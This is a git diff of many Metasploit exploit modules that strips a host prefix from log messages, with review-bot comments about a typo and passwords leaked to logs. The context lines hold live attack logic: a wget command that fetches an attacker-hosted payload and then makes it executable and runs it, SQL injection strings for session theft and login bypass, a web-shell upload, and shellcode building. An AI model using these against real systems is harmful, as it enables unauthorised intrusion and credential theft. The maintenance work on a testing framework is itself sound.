@@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote @dropped_elf = rand_text_alpha(rand(5) + 3) command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(command) if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/ register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf)) @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};" command << File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") exec_command(command, 1) end diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index 54a1b3bd45..cfc944d929 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb 
@@ -68,19 +68,19 @@ class Metasploit4 < Msf::Exploit::Remote 'uri' => '/cgi-bin/ping.sh' ) if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /Boa\/(.*)/ - vprint_status("#{peer} - Found Boa version #{$1}") + vprint_status("Found Boa version #{$1}") else - print_status("#{peer} - Target is not a Boa web server") + print_status("Target is not a Boa web server") return Exploit::CheckCode::Safe end if res.body.to_s.index('127.0.0.1 ping statistics') return Exploit::CheckCode::Detected else - vprint_error("#{peer} - Target does not appear to be an Advantech switch") + vprint_error("Target does not appear to be an Advantech switch") return Expoit::CheckCode::Safe end end @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote # def exploit cmd = cve_2014_6271(payload.encoded) - vprint_status("#{peer} - Trying to run command '#{cmd}'") + vprint_status("Trying to run command '#{cmd}'") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh', diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb index 42232de7a8..a64e532d2a 100644 --- a/modules/exploits/linux/http/airties_login_cgi_bof.rb +++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 100 diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 343ff95190..0805c4f7c4 100644 
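Review bot: In advantech_switch_bash_env_exec.rb (hunk -68,19), the final `else` branch ends with `return Expoit::CheckCode::Safe`, which misspells the constant. Reaching that branch would raise a NameError instead of returning a check code. The line is unchanged context, but the `vprint_error` directly above it is edited here, so it is worth correcting in the same pass to `return Exploit::CheckCode::Safe`. The enclosing `check` method starts above the hunk.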
--- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" - print_status("#{peer} - Trying to grab admin session through SQLi") + print_status("Trying to grab admin session through SQLi") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ admin_session = $1 @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") - print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") + print_status("Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") end @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Action [ #{action} ]") + print_status("Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ @action_id = $1 - print_status("#{peer} - Action ID is [ #{@action_id} ]") + print_status("Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end 
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ policy_ctx = $1 policy_group = $2 - print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") + print_status("Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Policy [ #{policy} ]") + print_status("Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") end @@ -237,13 +237,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ @policy_id = $1 - print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") + print_status("Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -255,14 +255,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. dont_exist = rand_text_alpha(8+rand(4)) - print_status("#{peer} - Triggering policy and action by requesting a non existing url") + print_status("Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, dont_exist), 
@@ -270,7 +270,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 404 - print_status("#{peer} - Payload delivered") + print_status("Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") end @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup begin # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") + print_status("Cleaning up") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), @@ -291,9 +291,9 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else - print_warning("#{peer} - Unable to retrieve token") + print_warning("Unable to retrieve token") end # Remove our policy @@ -309,9 +309,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + print_status("Policy ID [ #{@policy_id} ] removed") else - print_warning("#{peer} - Unable to remove Policy ID") + print_warning("Unable to remove Policy ID") end # Remove our action @@ -325,13 +325,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Action ID [ #{@action_id} ] removed") + print_status("Action ID [ #{@action_id} ] removed") else - print_warning("#{peer} - Unable to remove Action ID") + print_warning("Unable to remove Action ID") end # Reload the policies to revert back to the state before exploitation - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), 
@@ -343,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index a721d59af2..e08ec2ccf0 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect Astium") + vprint_status("Trying to detect Astium") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri), @@ -82,16 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/ session = $1 - print_good("#{peer} - Session cookie is [ #{session} ]") + print_good("Session cookie is [ #{session} ]") redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET', 
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote pass = rand_text_alphanumeric(10) post_data = "__act=submit&user_name=#{sqli}&pass_word=#{pass}&submit=Login" - print_status("#{peer} - Using SQLi to bypass authentication") + print_status("Using SQLi to bypass authentication") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "/en", "logon.php"), @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(phppayload, "application/octet-stream", nil, "file; name=\"importcompany\"; filename=\"#{payload_name}\"") file = post_data.to_s - print_status("#{peer} - Uploading Payload [ #{payload_name} ]") + print_status("Uploading Payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "en", "database", "import.php"), @@ -168,8 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}") - print_status("#{peer} - Requesting Payload [ #{uri}upload/#{payload_name} ]") - print_status("#{peer} - Waiting as the reloading process may take some time, this may take a couple of minutes") + print_status("Requesting Payload [ #{uri}upload/#{payload_name} ]") + print_status("Waiting as the reloading process may take some time, this may take a couple of minutes") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "upload", "#{payload_name}") @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response...") + print_error("Unexpected response...") end end diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb index 2994ce4a32..7ead5ddb5a 100644 --- a/modules/exploits/linux/http/belkin_login_bof.rb +++ b/modules/exploits/linux/http/belkin_login_bof.rb 
@@ -78,13 +78,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200 diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 417e2e6d14..3ed353e001 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") random_id = rand_text_numeric(5 + rand(8)) random_char = rand_text_alphanumeric(1) session_injection = "#{random_id}' or '#{random_char}'='#{random_char}" diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index e345dc28a1..d0fe19aec3 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -74,13 +74,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, 
diff --git a/modules/exploits/linux/http/dlink_dcs931l_upload.rb b/modules/exploits/linux/http/dlink_dcs931l_upload.rb index bca4beed87..1fb8bbaf5e 100644 --- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb +++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb @@ -72,15 +72,15 @@ class Metasploit4 < Msf::Exploit::Remote )) unless res - vprint_status("#{peer} - The connection timed out.") + vprint_status("The connection timed out.") return Exploit::CheckCode::Unknown end if res.code && res.code == 404 - vprint_status("#{peer} - uploadfile.htm does not exist") + vprint_status("uploadfile.htm does not exist") return Exploit::CheckCode::Safe elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/ return Exploit::CheckCode::Vulnerable @@ -101,7 +101,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Payload uploaded successfully") + print_good("Payload uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload") end @@ -117,7 +117,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Stager uploaded successfully") + print_good("Stager uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager") end 
@@ -140,7 +140,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 401 fail_with(Failure::NoAccess, "#{peer} - Authentication failed") elsif res.code && res.code == 200 && res.body - print_good("#{peer} - Payload executed successfully") + print_good("Payload executed successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed") end @@ -169,9 +169,9 @@ rm -f /tmp/tmpchpw EOF res = upload('/sbin/chpasswd.sh', chpasswd) if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully") + vprint_good("Restored /sbin/chpasswd.sh successfully") else - vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default") + vprint_warning("Could not restore /sbin/chpasswd.sh to default") end end @@ -179,7 +179,7 @@ EOF # Upload a file to a specified path # def upload(path, data) - vprint_status("#{peer} - Writing #{data.length} bytes to #{path}") + vprint_status("Writing #{data.length} bytes to #{path}") boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" post_data = "--#{boundary}\r\n" diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 14d871d2b0..314bc380bd 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote shellcode << rand_text(0x1c) # filler shellcode << payload.encoded # shellcode - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb index 66ea232ee9..84e8fbe741 100644 --- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb 
+++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb @@ -73,20 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") @counter = 1 execute_cmdstager( :flavor => :echo, :linemax => 95 # limited by our upload, larger payloads crash the web server ) - print_status("#{peer} - creating payload and executing it ...") + print_status("creating payload and executing it ...") (1 .. @counter).each do |act_file| # the http server blocks access to our files ... we copy it to a new one diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 2fe19360ba..914ba26974 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb index e455b14a64..ef34cda681 100644 --- a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb 
@@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index 62f500e8eb..70967ebe23 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb index 0f001df572..0d747ee3b8 100644 --- a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, 
diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index fc89dd0e39..df5eab20f3 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -80,13 +80,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index 1513892d77..5478e1f05c 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb 
@@ -117,26 +117,26 @@ class Metasploit3 < Msf::Exploit::Remote @uri.path << "/" if @uri.path[-1, 1] != "/" peer = "#{rhost}:#{rport}" - print_status("#{peer} - Getting the sid and token...") + print_status("Getting the sid and token...") sid, token = get_sid_token if sid.nil? - print_error("#{peer} - Unable to retrieve a session ID") + print_error("Unable to retrieve a session ID") return elsif token.nil? - print_error("#{peer} - Unable to retrieve a token") + print_error("Unable to retrieve a token") return end user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("#{peer} - Attempt to login with \"#{user}:#{pass}\"") + print_status("Attempt to login with \"#{user}:#{pass}\"") success = login(sid, token) if not success - print_error("#{peer} - Unable to login") + print_error("Unable to login") return end - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@uri.path, "admin/tools/export.php"), diff --git a/modules/exploits/linux/http/esva_exec.rb b/modules/exploits/linux/http/esva_exec.rb index de1a4d8942..86c03e5227 100644 --- a/modules/exploits/linux/http/esva_exec.rb +++ b/modules/exploits/linux/http/esva_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'GET', 'uri' => "/cgi-bin/learn-msg.cgi", 
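Review bot: In dolibarr_cmd_exec.rb (hunk -117,26), `print_status("Attempt to login with \"#{user}:#{pass}\"")` writes the configured PASSWORD in clear text to the console, and from there into any spooled or captured session output. The progress message works just as well with the account name alone, for example `print_status("Attempt to login as \"#{user}\"")`. The surrounding method begins above the hunk and continues below it.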
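Review bot: In esva_exec.rb (hunk -73,7), the context line `peer = "#{rhost}:#{rport}"` at the top of `exploit` has no remaining reader in the visible lines once the `#{peer} - ` prefixes are removed here and in the next hunk (-84,12). The local also shadows the `peer` helper that other modules in this patch call without defining, presumably from the HTTP client mixin. If nothing further down in `exploit` uses it, the assignment can be dropped. The dolibarr_cmd_exec.rb hunk at -117,26 keeps the same leftover line, and in both files the method body runs past the hunk.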
@@ -84,12 +84,12 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably something is wrong if not res or res.code != 200 or res.body !~ /meta http-equiv="refresh" content="0;URL=\/learned.html"/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end - print_good("#{peer} - Command executed successfully") - print_status("#{peer} - Output: \n#{res.body.split("Learned tokens")[0]}") + print_good("Command executed successfully") + print_status("Output: \n#{res.body.split("Learned tokens")[0]}") end end diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb index acb764be06..da57034a85 100644 --- a/modules/exploits/linux/http/fritzbox_echo_exec.rb +++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb @@ -101,13 +101,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( flavor: :echo, linemax: 92 diff --git a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb index a7ca3d7d9b..f3a9285a0b 100644 --- a/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb +++ b/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb 
@@ -115,14 +115,14 @@ class Metasploit3 < Msf::Exploit::Remote def exploit peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") @josso_id = get_josso_token if @josso_id.nil? fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve a JOSSO session ID") end - print_good("#{peer} - Authentication successful") + print_good("Authentication successful") - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") execute_command(payload.encoded) end end diff --git a/modules/exploits/linux/http/kloxo_sqli.rb b/modules/exploits/linux/http/kloxo_sqli.rb index e3c2a9b4a8..d1911a1fd9 100644 --- a/modules/exploits/linux/http/kloxo_sqli.rb +++ b/modules/exploits/linux/http/kloxo_sqli.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited") unless check == Exploit::CheckCode::Vulnerable - print_status("#{peer} - Recovering the admin password with SQLi...") + print_status("Recovering the admin password with SQLi...") loot = base64_password fail_with(Failure::Unknown, "#{peer} - Failed to exploit the SQLi...") if loot.nil? @password = Rex::Text.decode_base64(loot) - print_good("#{peer} - Password recovered: #{@password}") + print_good("Password recovered: #{@password}") - print_status("#{peer} - Logging into the Control Panel...") + print_status("Logging into the Control Panel...") @session = send_login fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{@password} failed...") if @session.nil? 
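Review bot: `print_good("Password recovered: #{@password}")` in the kloxo_sqli.rb hunk writes a recovered plaintext password at normal verbosity, and the commit rewrites the line without revisiting that. Console output is commonly spooled to files and pasted into reports, so the secret ends up outside whatever credential storage the engagement uses. Consider `vprint_good("Password recovered: #{@password}")` with a non-secret status line in its place. The pandora_fms_sqli.rb hunks show the same pattern in `Extracted auto login password (#{password})` and `Successfully retrieved session cookie: #{@cookie}`. `exploit` continues past this hunk, so the credential-reporting call that appears to follow is only partly visible.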
@@ -130,11 +130,11 @@ class Metasploit3 < Msf::Exploit::Remote attempt_time: DateTime.now ) - print_status("#{peer} - Retrieving the server name...") + print_status("Retrieving the server name...") @server = server_info fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{Rex::Text.decode_base64(base64_password)} failed...") if @server.nil? - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") send_command(payload.encoded) end @@ -252,14 +252,14 @@ class Metasploit3 < Msf::Exploit::Remote loot = '' until exploit_sqli(i, "\x00") - vprint_status("#{peer} - Bruteforcing position #{i}") + vprint_status("Bruteforcing position #{i}") c = brute_force_char(i) if c.nil? return nil else loot << c end - vprint_status("#{peer} - Found: #{loot}") + vprint_status("Found: #{loot}") i = i + 1 end @@ -297,7 +297,7 @@ class Metasploit3 < Msf::Exploit::Remote return false end - vprint_warning("#{peer} - Unknown fingerprint while exploiting SQLi... be careful") + vprint_warning("Unknown fingerprint while exploiting SQLi... be careful") false end diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 1831de7645..16b771a9f4 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -109,13 +109,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager({:flavor => :echo}) end diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb index 67a93ba046..41bace5c42 100644 --- a/modules/exploits/linux/http/multi_ncc_ping_exec.rb 
